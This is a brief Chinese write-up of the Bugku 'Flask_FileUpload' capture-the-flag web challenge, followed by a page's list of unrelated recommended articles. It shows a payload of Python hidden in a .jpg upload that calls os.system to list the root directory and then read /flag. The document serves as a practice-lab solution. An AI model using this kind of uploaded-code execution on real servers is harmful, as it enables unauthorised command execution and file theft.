Bugku-web-Flask_FileUpload
查看源代码,提示用python返回结果
在file.jpg中写python代码
import os
os.system('ls / ')上传后查看源代码,找到flag文件夹
修改代码
import os
os.system('cat /flag ')
Bugku-web-Flask_FileUpload
黑白时光les2024-08-01 11:52
相关推荐
天渺工作室3 小时前
实现一个adblock/adblock plus等浏览器广告拦截器检测插件阳光是sunny3 小时前
Vue 项目怎么做用户行为全链路监控?轻量插件方案详解ZhengEnCi3 小时前
Q04-Vite禁用CSS代码分割-解决生产环境样式加载顺序混乱问题九酒4 小时前
AI Agent 开发踩坑记:口播功能非得用 APP 原生实现吗?Jackson__4 小时前
做了一段时间的AI coding后,我终于搞清了 CLI 和 MCP 的区别IT_陈寒7 小时前
JavaScript项目实战经验分享用户47949283569158 小时前
6w star,GitHub 趋势第一的 Ponytail,这个agent插件到底在火什么薛定喵的谔9 小时前
我开源了一个精致的 Next.js 博客模板:SkyplumeWarson_L9 小时前
Python `Annotated` 与 LangGraph Reducer 学习笔记韩师傅9 小时前
海天线算法的前世今生